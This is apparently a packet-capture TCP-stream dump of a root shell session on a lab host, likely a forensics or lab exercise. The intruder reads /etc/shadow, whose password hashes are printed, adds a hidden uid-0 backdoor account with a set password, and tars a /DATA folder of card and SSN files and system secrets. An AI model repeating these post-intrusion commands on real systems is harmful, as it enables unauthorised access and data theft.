
===================================================================
Follow: tcp,ascii
Filter: tcp.stream eq 0
Node 0: 10.0.0.105:38951
Node 1: 10.0.0.102:9999
0

	0

0

	3
id

0

24
uid=0(root) gid=0(root)

	16
cat /etc/shadow

1233
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::
www-data:*:14684:0:99999:7:::
backup:*:14684:0:99999:7:::
list:*:14684:0:99999:7:::
irc:*:14684:0:99999:7:::
gnats:*:14684:0:99999:7:::
nobody:*:14684:0:99999:7:::
libuuid:!:14684:0:99999:7:::
dhcp:*:14684:0:99999:7:::
syslog:*:14684:0:99999:7:::
klog:$1$f2ZVMS4K$R9XkI.CmLdHhdUE3X9jqP0:14742:0:99999:7:::
sshd:*:14684:0:99999:7:::
msfadmin:$1$XN10Zj2c$Rt/zzCW3mLtUWA.ihZjA5/:14684:0:99999:7:::
bind:*:14685:0:99999:7:::
postfix:*:14685:0:99999:7:::
ftp:*:14685:0:99999:7:::
postgres:$1$Rw35ik.x$MgQgZUuO5pAoUvfJhfcYe/:14685:0:99999:7:::
mysql:!:14685:0:99999:7:::
tomcat55:*:14691:0:99999:7:::
distccd:*:14698:0:99999:7:::
user:$1$HESu9xrH$k.o3G93DGoXIiQKkPmUgZ0:14699:0:99999:7:::
service:$1$kR3ue7JZ$7GxELDupr5Ohp6cjZ3Bu//:14715:0:99999:7:::
telnetd:*:14715:0:99999:7:::
proftpd:!:14727:0:99999:7:::
statd:*:15474:0:99999:7:::
snmp:*:15480:0:99999:7:::

	61
useradd --uid 0 --gid 0 --non-unique --shell /bin/sh SUWtHEh

	15
passwd SUWtHEh

	9
Testing1

	9
Testing1

	5
ls /

141
0
DATA
a.tar
bin
boot
cdrom
dev
etc
home
initrd
initrd.img
lib
lost+found
media
mnt
nohup.out
opt
proc
root
sbin
srv
sys
tmp
usr
var
vmlinuz

	9
ls /DATA

16
SSN_CCN
secrets

	29
tar -cvf SUWtHEh.tar /DATA/*

15
/DATA/SSN_CCN/

29
/DATA/SSN_CCN/1-MB-Test.docx

35
/DATA/SSN_CCN/Credit-Card-data.csv

35
/DATA/SSN_CCN/Credit-Card-data.pdf

30
/DATA/SSN_CCN/10-MB-Test.xlsx

25
/DATA/SSN_CCN/data1.xlsx

30
/DATA/SSN_CCN/10-MB-Test.docx

35
/DATA/SSN_CCN/Credit-Card-data.xls

618
/DATA/secrets/
/DATA/secrets/fstab
/DATA/secrets/shadow
/DATA/secrets/lsb-release
/DATA/secrets/gdm/
/DATA/secrets/gdm/failsafeDexconf
/DATA/secrets/gdm/failsafeXServer
/DATA/secrets/gdm/failsafeBlacklist
/DATA/secrets/gdm/failsafeXinit
/DATA/secrets/pam.conf
/DATA/secrets/bash.bashrc
/DATA/secrets/modules
/DATA/secrets/pango/
/DATA/secrets/pango/pangox.aliases
/DATA/secrets/aliases.db
/DATA/secrets/php5/
/DATA/secrets/php5/apache2/
/DATA/secrets/php5/apache2/php.ini
/DATA/secrets/php5/cgi/
/DATA/secrets/php5/cgi/php.ini
/DATA/secrets/php5/cgi/conf.d
/DATA/secrets/php5/conf.d/
/DATA/secrets/php5/conf.d/pdo.ini

36
/DATA/secrets/php5/conf.d/mysql.ini

37
/DATA/secrets/php5/conf.d/mysqli.ini

40
/DATA/secrets/php5/conf.d/pdo_mysql.ini

33
/DATA/secrets/php5/conf.d/gd.ini

220
/DATA/secrets/php5/cli/
/DATA/secrets/php5/cli/php.ini
/DATA/secrets/php5/cli/conf.d
/DATA/secrets/motd.tail
/DATA/secrets/gshadow-
/DATA/secrets/gssapi_mech.conf
/DATA/secrets/mysql/
/DATA/secrets/mysql/server-cert.pem

33
/DATA/secrets/mysql/debian-start

32
/DATA/secrets/mysql/ca-cert.pem

70
/DATA/secrets/mysql/client-req.pem
/DATA/secrets/mysql/server-key.pem

31
/DATA/secrets/mysql/debian.cnf

27
/DATA/secrets/mysql/my.cnf

35
/DATA/secrets/mysql/server-req.pem

35
/DATA/secrets/mysql/client-key.pem

28
/DATA/secrets/mysql/conf.d/

45
/DATA/secrets/mysql/conf.d/old_passwords.cnf

36
/DATA/secrets/mysql/client-cert.pem

31
/DATA/secrets/mysql/ca-key.pem

24
/DATA/secrets/depmod.d/

35
/DATA/secrets/depmod.d/ubuntu.conf

21
/DATA/secrets/emacs/

34
/DATA/secrets/emacs/site-start.d/

47
/DATA/secrets/emacs/site-start.d/50autoconf.el

23
/DATA/secrets/networks

22
/DATA/secrets/gshadow

28
/DATA/secrets/cron.monthly/

36
/DATA/secrets/cron.monthly/standard

35
/DATA/secrets/cron.monthly/proftpd

40
/DATA/secrets/cron.monthly/.placeholder

24
/DATA/secrets/fuse.conf

21
/DATA/secrets/gconf/

23
/DATA/secrets/gconf/2/

35
/DATA/secrets/gconf/2/evoldap.conf

27
/DATA/secrets/gconf/2/path

40
/DATA/secrets/gconf/gconf.xml.defaults/

55
/DATA/secrets/gconf/gconf.xml.defaults/%gconf-tree.xml

41
/DATA/secrets/gconf/gconf.xml.mandatory/

82
/DATA/secrets/gconf/gconf.xml.mandatory/%gconf-tree.xml
/DATA/secrets/sysctl.conf

23
/DATA/secrets/gai.conf

27
/DATA/secrets/cron.weekly/

45
/DATA/secrets/cron.weekly/popularity-contest

33
/DATA/secrets/cron.weekly/man-db

39
/DATA/secrets/cron.weekly/.placeholder

35
/DATA/secrets/cron.weekly/sysklogd

34
/DATA/secrets/lsb-base-logging.sh

25
/DATA/secrets/hosts.deny

33
/DATA/secrets/postgresql-common/

53
/DATA/secrets/postgresql-common/pg_upgradecluster.d/

48
/DATA/secrets/postgresql-common/autovacuum.conf

41
/DATA/secrets/postgresql-common/root.crt

46
/DATA/secrets/postgresql-common/user_clusters

26
/DATA/secrets/vsftpd.conf

27
/DATA/secrets/adduser.conf

27
/DATA/secrets/su-to-rootrc

21
/DATA/secrets/rc1.d/

27
/DATA/secrets/rc1.d/README

31
/DATA/secrets/rc1.d/K50proftpd

30
/DATA/secrets/rc1.d/K20distcc

754
/DATA/secrets/rc1.d/K21mysql
/DATA/secrets/rc1.d/K20snmpd
/DATA/secrets/rc1.d/S30killprocs
/DATA/secrets/rc1.d/K22mysql-ndb
/DATA/secrets/rc1.d/K20openbsd-inetd
/DATA/secrets/rc1.d/K20postfix
/DATA/secrets/rc1.d/K20rsync
/DATA/secrets/rc1.d/K23mysql-ndb-mgm
/DATA/secrets/rc1.d/K20xinetd
/DATA/secrets/rc1.d/K10tomcat5.5
/DATA/secrets/rc1.d/K39ufw
/DATA/secrets/rc1.d/K89klogd
/DATA/secrets/rc1.d/K84ssh
/DATA/secrets/rc1.d/K90sysklogd
/DATA/secrets/rc1.d/K09apache2
/DATA/secrets/rc1.d/K85bind9
/DATA/secrets/rc1.d/K80nfs-kernel-server
/DATA/secrets/rc1.d/K21postgresql-8.3
/DATA/secrets/rc1.d/K20nfs-common
/DATA/secrets/rc1.d/K11atd
/DATA/secrets/rc1.d/K11cron
/DATA/secrets/rc1.d/S90single
/DATA/secrets/rc1.d/K19samba
/DATA/secrets/rc1.d/K81portmap

48
/DATA/secrets/cron.d/
/DATA/secrets/cron.d/php5

39
/DATA/secrets/cron.d/postgresql-common

34
/DATA/secrets/cron.d/.placeholder

23
/DATA/secrets/screenrc

28
/DATA/secrets/alternatives/

46
/DATA/secrets/alternatives/create_domain.7.gz

33
/DATA/secrets/alternatives/write

74
/DATA/secrets/alternatives/native2ascii
/DATA/secrets/alternatives/README

42
/DATA/secrets/alternatives/drop_rule.7.gz

79
/DATA/secrets/alternatives/reindexdb.1.gz
/DATA/secrets/alternatives/show.7.gz

61
/DATA/secrets/alternatives/alter_text_search_dictionary.7.gz

177
/DATA/secrets/alternatives/javadoc.1.gz
/DATA/secrets/alternatives/tnameserv.1.gz
/DATA/secrets/alternatives/alter_tablespace.7.gz
/DATA/secrets/alternatives/create_schema.7.gz

53
/DATA/secrets/alternatives/drop_operator_family.7.gz

44
/DATA/secrets/alternatives/alter_table.7.gz

163
/DATA/secrets/alternatives/checkpoint.7.gz
/DATA/secrets/alternatives/discard.7.gz
/DATA/secrets/alternatives/drop_cast.7.gz
/DATA/secrets/alternatives/ex.pl.1.gz

39
/DATA/secrets/alternatives/editor.1.gz

554
/DATA/secrets/alternatives/mt.1.gz
/DATA/secrets/alternatives/infobrowser
/DATA/secrets/alternatives/x-window-manager.1.gz
/DATA/secrets/alternatives/vi.fr.1.gz
/DATA/secrets/alternatives/netcat
/DATA/secrets/alternatives/jar
/DATA/secrets/alternatives/select_into.7.gz
/DATA/secrets/alternatives/drop_table.7.gz
/DATA/secrets/alternatives/create_role.7.gz
/DATA/secrets/alternatives/drop_view.7.gz
/DATA/secrets/alternatives/reindex.7.gz
/DATA/secrets/alternatives/rvim
/DATA/secrets/alternatives/nc.1.gz
/DATA/secrets/alternatives/create_table_as.7.gz

114
/DATA/secrets/alternatives/view.pl.1.gz
/DATA/secrets/alternatives/c99
/DATA/secrets/alternatives/createuser.1.gz

421
/DATA/secrets/alternatives/dropuser.1.gz
/DATA/secrets/alternatives/telnet.1.gz
/DATA/secrets/alternatives/grant.7.gz
/DATA/secrets/alternatives/appletviewer
/DATA/secrets/alternatives/close.7.gz
/DATA/secrets/alternatives/commit_prepared.7.gz
/DATA/secrets/alternatives/set_transaction.7.gz
/DATA/secrets/alternatives/ex.it.1.gz
/DATA/secrets/alternatives/insert.7.gz
/DATA/secrets/alternatives/drop_operator_class.7.gz

218
/DATA/secrets/alternatives/drop_text_search_template.7.gz
/DATA/secrets/alternatives/rsh
/DATA/secrets/alternatives/ex.it.ISO8859-1.1.gz
/DATA/secrets/alternatives/alter_schema.7.gz
/DATA/secrets/alternatives/c++.1.gz

50
/DATA/secrets/alternatives/view.it.ISO8859-1.1.gz

55
/DATA/secrets/alternatives/create_operator_family.7.gz

248
/DATA/secrets/alternatives/infobrowser.1.gz
/DATA/secrets/alternatives/rmid
/DATA/secrets/alternatives/builtins.7.gz
/DATA/secrets/alternatives/ex.pl.ISO8859-2.1.gz
/DATA/secrets/alternatives/netcat.1.gz
/DATA/secrets/alternatives/ex.pl.UTF-8.1.gz

251
/DATA/secrets/alternatives/drop_role.7.gz
/DATA/secrets/alternatives/ex.it.UTF-8.1.gz
/DATA/secrets/alternatives/vi.1.gz
/DATA/secrets/alternatives/drop_database.7.gz
/DATA/secrets/alternatives/c99.1.gz
/DATA/secrets/alternatives/vi.pl.ISO8859-2.1.gz

46
/DATA/secrets/alternatives/view.fr.UTF-8.1.gz

389
/DATA/secrets/alternatives/js.1.gz
/DATA/secrets/alternatives/rsh.1.gz
/DATA/secrets/alternatives/pg_resetxlog.1.gz
/DATA/secrets/alternatives/commit.7.gz
/DATA/secrets/alternatives/x-terminal-emulator.1.gz
/DATA/secrets/alternatives/w
/DATA/secrets/alternatives/c89.1.gz
/DATA/secrets/alternatives/drop_aggregate.7.gz
/DATA/secrets/alternatives/www-browser
/DATA/secrets/alternatives/ftp

60
/DATA/secrets/alternatives/create_text_search_template.7.gz

293
/DATA/secrets/alternatives/nawk.1.gz
/DATA/secrets/alternatives/select.7.gz
/DATA/secrets/alternatives/delete.7.gz
/DATA/secrets/alternatives/x-window-manager
/DATA/secrets/alternatives/native2ascii.1.gz
/DATA/secrets/alternatives/rollback.7.gz
/DATA/secrets/alternatives/ex.fr.ISO8859-1.1.gz

54
/DATA/secrets/alternatives/alter_operator_family.7.gz

264
/DATA/secrets/alternatives/jarsigner
/DATA/secrets/alternatives/vncconnect
/DATA/secrets/alternatives/pager
/DATA/secrets/alternatives/create_table.7.gz
/DATA/secrets/alternatives/c89
/DATA/secrets/alternatives/copy.7.gz
/DATA/secrets/alternatives/createlang.1.gz

37
/DATA/secrets/alternatives/load.7.gz

64
/DATA/secrets/alternatives/alter_text_search_configuration.7.gz

121
/DATA/secrets/alternatives/dropdb.1.gz
/DATA/secrets/alternatives/vi.it.1.gz
/DATA/secrets/alternatives/create_cast.7.gz

40
/DATA/secrets/alternatives/view.ru.1.gz

48
/DATA/secrets/alternatives/vi.it.ISO8859-1.1.gz

127
/DATA/secrets/alternatives/view.pl.UTF-8.1.gz
/DATA/secrets/alternatives/faked.sv.1.gz
/DATA/secrets/alternatives/analyze.7.gz

247
/DATA/secrets/alternatives/serialver
/DATA/secrets/alternatives/savepoint.7.gz
/DATA/secrets/alternatives/create_tablespace.7.gz
/DATA/secrets/alternatives/declare.7.gz
/DATA/secrets/alternatives/javadoc
/DATA/secrets/alternatives/alter_role.7.gz

38
/DATA/secrets/alternatives/fetch.7.gz

128
/DATA/secrets/alternatives/drop_tablespace.7.gz
/DATA/secrets/alternatives/rmiregistry.1.gz
/DATA/secrets/alternatives/rcp.1.gz

41
/DATA/secrets/alternatives/unlisten.7.gz

104
/DATA/secrets/alternatives/view.1.gz
/DATA/secrets/alternatives/javah
/DATA/secrets/alternatives/telnet

122
/DATA/secrets/alternatives/alter_database.7.gz
/DATA/secrets/alternatives/rmt.8.gz
/DATA/secrets/alternatives/revoke.7.gz

69
/DATA/secrets/alternatives/initdb.1.gz
/DATA/secrets/alternatives/ex

58
/DATA/secrets/alternatives/set_session_authorization.7.gz

288
/DATA/secrets/alternatives/drop_owned.7.gz
/DATA/secrets/alternatives/truncate.7.gz
/DATA/secrets/alternatives/vncserver
/DATA/secrets/alternatives/ipcclean.1.gz
/DATA/secrets/alternatives/x-terminal-emulator
/DATA/secrets/alternatives/create_operator.7.gz
/DATA/secrets/alternatives/awk

37
/DATA/secrets/alternatives/orbd.1.gz

504
/DATA/secrets/alternatives/create_function.7.gz
/DATA/secrets/alternatives/c++
/DATA/secrets/alternatives/locate.1.gz
/DATA/secrets/alternatives/start_transaction.7.gz
/DATA/secrets/alternatives/alter_trigger.7.gz
/DATA/secrets/alternatives/end.7.gz
/DATA/secrets/alternatives/vncpasswd
/DATA/secrets/alternatives/vi.pl.UTF-8.1.gz
/DATA/secrets/alternatives/vncpasswd.1.gz
/DATA/secrets/alternatives/create_type.7.gz
/DATA/secrets/alternatives/view.fr.ISO8859-1.1.gz
/DATA/secrets/alternatives/rmic.1.gz

241
/DATA/secrets/alternatives/vacuum.7.gz
/DATA/secrets/alternatives/rename.1.gz
/DATA/secrets/alternatives/serialver.1.gz
/DATA/secrets/alternatives/rmt
/DATA/secrets/alternatives/pg_dumpall.1.gz
/DATA/secrets/alternatives/alter_operator.7.gz

44
/DATA/secrets/alternatives/traceroute6.8.gz

59
/DATA/secrets/alternatives/alter_text_search_template.7.gz

83
/DATA/secrets/alternatives/drop_user.7.gz
/DATA/secrets/alternatives/createdb.1.gz

58
/DATA/secrets/alternatives/create_constraint_trigger.7.gz

86
/DATA/secrets/alternatives/postmaster.1.gz
/DATA/secrets/alternatives/alter_type.7.gz

60
/DATA/secrets/alternatives/drop_text_search_dictionary.7.gz

201
/DATA/secrets/alternatives/nawk
/DATA/secrets/alternatives/gconftool.1.gz
/DATA/secrets/alternatives/view.fr.1.gz
/DATA/secrets/alternatives/drop_index.7.gz
/DATA/secrets/alternatives/create_view.7.gz

30
/DATA/secrets/alternatives/js

38
/DATA/secrets/alternatives/reset.7.gz

63
/DATA/secrets/alternatives/drop_text_search_configuration.7.gz

44
/DATA/secrets/alternatives/alter_index.7.gz

54
/DATA/secrets/alternatives/create_operator_class.7.gz

40
/DATA/secrets/alternatives/view.it.1.gz

205
/DATA/secrets/alternatives/rlogin
/DATA/secrets/alternatives/pg_dump.1.gz
/DATA/secrets/alternatives/alter_user.7.gz
/DATA/secrets/alternatives/drop_function.7.gz
/DATA/secrets/alternatives/clusterdb.1.gz

39
/DATA/secrets/alternatives/values.7.gz

120
/DATA/secrets/alternatives/explain.7.gz
/DATA/secrets/alternatives/appletviewer.1.gz
/DATA/secrets/alternatives/ex.1.gz

128
/DATA/secrets/alternatives/drop_conversion.7.gz
/DATA/secrets/alternatives/create_sequence.7.gz
/DATA/secrets/alternatives/rmic

37
/DATA/secrets/alternatives/lock.7.gz

109
/DATA/secrets/alternatives/update.7.gz
/DATA/secrets/alternatives/w.1.gz
/DATA/secrets/alternatives/fakeroot

159
/DATA/secrets/alternatives/vacuumdb.1.gz
/DATA/secrets/alternatives/comment.7.gz
/DATA/secrets/alternatives/fakeroot.1.gz
/DATA/secrets/alternatives/pico.1.gz

36
/DATA/secrets/alternatives/awk.1.gz

91
/DATA/secrets/alternatives/alter_aggregate.7.gz
/DATA/secrets/alternatives/alter_view.7.gz

128
/DATA/secrets/alternatives/vimdiff
/DATA/secrets/alternatives/create_aggregate.7.gz
/DATA/secrets/alternatives/create_user.7.gz

41
/DATA/secrets/alternatives/postgres.1.gz

187
/DATA/secrets/alternatives/prepare_transaction.7.gz
/DATA/secrets/alternatives/vim
/DATA/secrets/alternatives/begin.7.gz
/DATA/secrets/alternatives/view
/DATA/secrets/alternatives/figlet

75
/DATA/secrets/alternatives/vi.pl.1.gz
/DATA/secrets/alternatives/rmid.1.gz

71
/DATA/secrets/alternatives/java
/DATA/secrets/alternatives/rlogin.1.gz

65
/DATA/secrets/alternatives/create_text_search_configuration.7.gz

244
/DATA/secrets/alternatives/create_index.7.gz
/DATA/secrets/alternatives/Xvnc.1.gz
/DATA/secrets/alternatives/mt
/DATA/secrets/alternatives/pager.1.gz
/DATA/secrets/alternatives/pg_controldata.1.gz
/DATA/secrets/alternatives/create_trigger.7.gz

210
/DATA/secrets/alternatives/faked.1.gz
/DATA/secrets/alternatives/javah.1.gz
/DATA/secrets/alternatives/execute.7.gz
/DATA/secrets/alternatives/create_conversion.7.gz
/DATA/secrets/alternatives/create_rule.7.gz

107
/DATA/secrets/alternatives/tnameserv
/DATA/secrets/alternatives/editor
/DATA/secrets/alternatives/php.1.gz

150
/DATA/secrets/alternatives/php
/DATA/secrets/alternatives/x-www-browser
/DATA/secrets/alternatives/vi
/DATA/secrets/alternatives/vi.fr.ISO8859-1.1.gz

117
/DATA/secrets/alternatives/ex.fr.UTF-8.1.gz
/DATA/secrets/alternatives/rcp
/DATA/secrets/alternatives/jarsigner.1.gz

47
/DATA/secrets/alternatives/alter_function.7.gz

280
/DATA/secrets/alternatives/move.7.gz
/DATA/secrets/alternatives/drop_schema.7.gz
/DATA/secrets/alternatives/abort.7.gz
/DATA/secrets/alternatives/rollback_prepared.7.gz
/DATA/secrets/alternatives/droplang.1.gz
/DATA/secrets/alternatives/cc
/DATA/secrets/alternatives/cluster.7.gz

82
/DATA/secrets/alternatives/fakeroot.es.1.gz
/DATA/secrets/alternatives/write.1.gz

77
/DATA/secrets/alternatives/deallocate.7.gz
/DATA/secrets/alternatives/locate

91
/DATA/secrets/alternatives/vncconnect.1.gz
/DATA/secrets/alternatives/set_constraints.7.gz

91
/DATA/secrets/alternatives/drop_group.7.gz
/DATA/secrets/alternatives/create_database.7.gz

96
/DATA/secrets/alternatives/alter_conversion.7.gz
/DATA/secrets/alternatives/reassign_owned.7.gz

78
/DATA/secrets/alternatives/ex.ru.1.gz
/DATA/secrets/alternatives/php-cgi.1.gz

44
/DATA/secrets/alternatives/vi.fr.UTF-8.1.gz

54
/DATA/secrets/alternatives/rollback_to_savepoint.7.gz

46
/DATA/secrets/alternatives/drop_operator.7.gz

95
/DATA/secrets/alternatives/alter_language.7.gz
/DATA/secrets/alternatives/create_language.7.gz

91
/DATA/secrets/alternatives/set_role.7.gz
/DATA/secrets/alternatives/view.pl.ISO8859-2.1.gz

87
/DATA/secrets/alternatives/www-browser.1.gz
/DATA/secrets/alternatives/pg_restore.1.gz

56
/DATA/secrets/alternatives/drop_text_search_parser.7.gz

39
/DATA/secrets/alternatives/notify.7.gz

39
/DATA/secrets/alternatives/listen.7.gz

45
/DATA/secrets/alternatives/drop_trigger.7.gz

189
/DATA/secrets/alternatives/vi.it.UTF-8.1.gz
/DATA/secrets/alternatives/release_savepoint.7.gz
/DATA/secrets/alternatives/orbd
/DATA/secrets/alternatives/rview
/DATA/secrets/alternatives/nc

62
/DATA/secrets/alternatives/create_text_search_dictionary.7.gz

160
/DATA/secrets/alternatives/drop_domain.7.gz
/DATA/secrets/alternatives/cpp
/DATA/secrets/alternatives/keytool.1.gz
/DATA/secrets/alternatives/alter_domain.7.gz

57
/DATA/secrets/alternatives/alter_text_search_parser.7.gz

764
/DATA/secrets/alternatives/fakeroot.fr.1.gz
/DATA/secrets/alternatives/create_group.7.gz
/DATA/secrets/alternatives/vi.ru.1.gz
/DATA/secrets/alternatives/drop_sequence.7.gz
/DATA/secrets/alternatives/fakeroot.sv.1.gz
/DATA/secrets/alternatives/faked.es.1.gz
/DATA/secrets/alternatives/view.it.UTF-8.1.gz
/DATA/secrets/alternatives/ftp.1.gz
/DATA/secrets/alternatives/faked.fr.1.gz
/DATA/secrets/alternatives/alter_group.7.gz
/DATA/secrets/alternatives/php-cgi-bin
/DATA/secrets/alternatives/pico
/DATA/secrets/alternatives/keytool
/DATA/secrets/alternatives/drop_type.7.gz
/DATA/secrets/alternatives/traceroute6
/DATA/secrets/alternatives/javac
/DATA/secrets/alternatives/psql.1.gz
/DATA/secrets/alternatives/alter_sequence.7.gz
/DATA/secrets/alternatives/cc.1.gz

58
/DATA/secrets/alternatives/create_text_search_parser.7.gz

40
/DATA/secrets/alternatives/prepare.7.gz

34
/DATA/secrets/alternatives/rename

53
/DATA/secrets/alternatives/alter_operator_class.7.gz

104
/DATA/secrets/alternatives/gconftool
/DATA/secrets/alternatives/Xvnc
/DATA/secrets/alternatives/php-cgi

119
/DATA/secrets/alternatives/ex.fr.1.gz
/DATA/secrets/alternatives/pg_ctl.1.gz
/DATA/secrets/alternatives/vncserver.1.gz

36
/DATA/secrets/alternatives/updatedb

111
/DATA/secrets/alternatives/set.7.gz
/DATA/secrets/alternatives/rmiregistry
/DATA/secrets/alternatives/jar.1.gz

46
/DATA/secrets/alternatives/drop_language.7.gz

24
/DATA/secrets/logcheck/

42
/DATA/secrets/logcheck/ignore.d.paranoid/

58
/DATA/secrets/logcheck/ignore.d.paranoid/mysql-server-5_0

40
/DATA/secrets/logcheck/ignore.d.server/

47
/DATA/secrets/logcheck/ignore.d.server/ntpdate

56
/DATA/secrets/logcheck/ignore.d.server/mysql-server-5_0

45
/DATA/secrets/logcheck/ignore.d.workstation/

61
/DATA/secrets/logcheck/ignore.d.workstation/mysql-server-5_0

27
/DATA/secrets/chatscripts/

1448
/DATA/secrets/chatscripts/provider
/DATA/secrets/chatscripts/pap
/DATA/secrets/ppp/
/DATA/secrets/ppp/peers/
/DATA/secrets/ppp/peers/provider
/DATA/secrets/ppp/ip-up
/DATA/secrets/ppp/chap-secrets
/DATA/secrets/ppp/ipv6-up
/DATA/secrets/ppp/ipv6-up.d/
/DATA/secrets/ppp/resolv/
/DATA/secrets/ppp/ip-up.d/
/DATA/secrets/ppp/ip-up.d/0dns-up
/DATA/secrets/ppp/ip-up.d/postfix
/DATA/secrets/ppp/ip-up.d/0000usepeerdns
/DATA/secrets/ppp/ipv6-down.d/
/DATA/secrets/ppp/ip-down
/DATA/secrets/ppp/pap-secrets
/DATA/secrets/ppp/ipv6-down
/DATA/secrets/ppp/options
/DATA/secrets/ppp/pppoe_on_boot
/DATA/secrets/ppp/ip-down.d/
/DATA/secrets/ppp/ip-down.d/postfix
/DATA/secrets/ppp/ip-down.d/0dns-down
/DATA/secrets/ppp/ip-down.d/0000usepeerdns
/DATA/secrets/rc4.d/
/DATA/secrets/rc4.d/README
/DATA/secrets/rc4.d/S11klogd
/DATA/secrets/rc4.d/S17portmap
/DATA/secrets/rc4.d/S20nfs-common
/DATA/secrets/rc4.d/S10sysklogd
/DATA/secrets/rc4.d/S16ssh
/DATA/secrets/rc4.d/S20distcc
/DATA/secrets/rc4.d/S50proftpd
/DATA/secrets/rc4.d/S20samba
/DATA/secrets/rc4.d/S15bind9
/DATA/secrets/rc4.d/S20snmpd
/DATA/secrets/rc4.d/S10xserver-xorg-input-wacom
/DATA/secrets/rc4.d/S99rc.local
/DATA/secrets/rc4.d/S18mysql-ndb
/DATA/secrets/rc4.d/S99rmnologin
/DATA/secrets/rc4.d/S20rsync
/DATA/secrets/rc4.d/S20xinetd
/DATA/secrets/rc4.d/S91apache2
/DATA/secrets/rc4.d/S89atd
/DATA/secrets/rc4.d/S17mysql-ndb-mgm
/DATA/secrets/rc4.d/S89cron
/DATA/secrets/rc4.d/S19mysql
/DATA/sec
1159
rets/rc4.d/S20openbsd-inetd
/DATA/secrets/rc4.d/S90tomcat5.5
/DATA/secrets/rc4.d/S19postgresql-8.3
/DATA/secrets/rc4.d/S20postfix
/DATA/secrets/rc4.d/S20nfs-kernel-server
/DATA/secrets/rc3.d/
/DATA/secrets/rc3.d/README
/DATA/secrets/rc3.d/S11klogd
/DATA/secrets/rc3.d/S17portmap
/DATA/secrets/rc3.d/S20nfs-common
/DATA/secrets/rc3.d/S10sysklogd
/DATA/secrets/rc3.d/S16ssh
/DATA/secrets/rc3.d/S20distcc
/DATA/secrets/rc3.d/S50proftpd
/DATA/secrets/rc3.d/S20samba
/DATA/secrets/rc3.d/S15bind9
/DATA/secrets/rc3.d/S20snmpd
/DATA/secrets/rc3.d/S10xserver-xorg-input-wacom
/DATA/secrets/rc3.d/S99rc.local
/DATA/secrets/rc3.d/S18mysql-ndb
/DATA/secrets/rc3.d/S99rmnologin
/DATA/secrets/rc3.d/S20rsync
/DATA/secrets/rc3.d/S20xinetd
/DATA/secrets/rc3.d/S91apache2
/DATA/secrets/rc3.d/S89atd
/DATA/secrets/rc3.d/S17mysql-ndb-mgm
/DATA/secrets/rc3.d/S89cron
/DATA/secrets/rc3.d/S19mysql
/DATA/secrets/rc3.d/S20openbsd-inetd
/DATA/secrets/rc3.d/S90tomcat5.5
/DATA/secrets/rc3.d/S19postgresql-8.3
/DATA/secrets/rc3.d/S20postfix
/DATA/secrets/rc3.d/S20nfs-kernel-server
/DATA/secrets/update-manager/
/DATA/secrets/update-manager/release-upgrades
/DATA/secrets/apparmor.d/

35
/DATA/secrets/apparmor.d/tunables/

39
/DATA/secrets/apparmor.d/tunables/home

39
/DATA/secrets/apparmor.d/tunables/proc

41
/DATA/secrets/apparmor.d/tunables/global

41
/DATA/secrets/apparmor.d/force-complain/

39
/DATA/secrets/apparmor.d/abstractions/

357
/DATA/secrets/apparmor.d/abstractions/orbit2
/DATA/secrets/apparmor.d/abstractions/kde
/DATA/secrets/apparmor.d/abstractions/php5
/DATA/secrets/apparmor.d/abstractions/ruby
/DATA/secrets/apparmor.d/abstractions/mysql
/DATA/secrets/apparmor.d/abstractions/X
/DATA/secrets/apparmor.d/abstractions/svn-repositories
/DATA/secrets/apparmor.d/abstractions/nvidia

44
/DATA/secrets/apparmor.d/abstractions/video

48
/DATA/secrets/apparmor.d/abstractions/ssl_certs

48
/DATA/secrets/apparmor.d/abstractions/user-mail

53
/DATA/secrets/apparmor.d/abstractions/authentication

43
/DATA/secrets/apparmor.d/abstractions/perl

44
/DATA/secrets/apparmor.d/abstractions/samba

43
/DATA/secrets/apparmor.d/abstractions/base

42
/DATA/secrets/apparmor.d/abstractions/nis

47
/DATA/secrets/apparmor.d/abstractions/web-data

47
/DATA/secrets/apparmor.d/abstractions/consoles

52
/DATA/secrets/apparmor.d/abstractions/user-download

47
/DATA/secrets/apparmor.d/abstractions/ssl_keys

44
/DATA/secrets/apparmor.d/abstractions/audio

49
/DATA/secrets/apparmor.d/abstractions/user-write

53
/DATA/secrets/apparmor.d/abstractions/kerberosclient

43
/DATA/secrets/apparmor.d/abstractions/bash

44
/DATA/secrets/apparmor.d/abstractions/fonts

46
/DATA/secrets/apparmor.d/abstractions/winbind

45
/DATA/secrets/apparmor.d/abstractions/python

44
/DATA/secrets/apparmor.d/abstractions/wutmp

54
/DATA/secrets/apparmor.d/abstractions/freedesktop.org

42
/DATA/secrets/apparmor.d/abstractions/xad

47
/DATA/secrets/apparmor.d/abstractions/likewise

44
/DATA/secrets/apparmor.d/abstractions/gnupg

50
/DATA/secrets/apparmor.d/abstractions/nameservice

47
/DATA/secrets/apparmor.d/abstractions/user-tmp

43
/DATA/secrets/apparmor.d/abstractions/dbus

45
/DATA/secrets/apparmor.d/abstractions/aspell

52
/DATA/secrets/apparmor.d/abstractions/user-manpages

43
/DATA/secrets/apparmor.d/abstractions/mdns

50
/DATA/secrets/apparmor.d/abstractions/cups-client

44
/DATA/secrets/apparmor.d/abstractions/gnome

41
/DATA/secrets/apparmor.d/usr.sbin.mysqld

40
/DATA/secrets/apparmor.d/usr.sbin.named

34
/DATA/secrets/apparmor.d/disable/

22
/DATA/secrets/aliases

23
/DATA/secrets/postfix/

28
/DATA/secrets/postfix/sasl/

30
/DATA/secrets/postfix/main.cf

35
/DATA/secrets/postfix/post-install

37
/DATA/secrets/postfix/postfix-script

32
/DATA/secrets/postfix/master.cf

36
/DATA/secrets/postfix/postfix-files

37
/DATA/secrets/postfix/dynamicmaps.cf

20
/DATA/secrets/perl/

24
/DATA/secrets/perl/Net/

34
/DATA/secrets/perl/Net/libnet.cfg

25
/DATA/secrets/perl/CPAN/

27
/DATA/secrets/debconf.conf

28
/DATA/secrets/ld.so.conf.d/

37
/DATA/secrets/ld.so.conf.d/libc.conf

47
/DATA/secrets/ld.so.conf.d/i486-linux-gnu.conf

20
/DATA/secrets/cups/

24
/DATA/secrets/xinetd.d/

31
/DATA/secrets/xinetd.d/discard

31
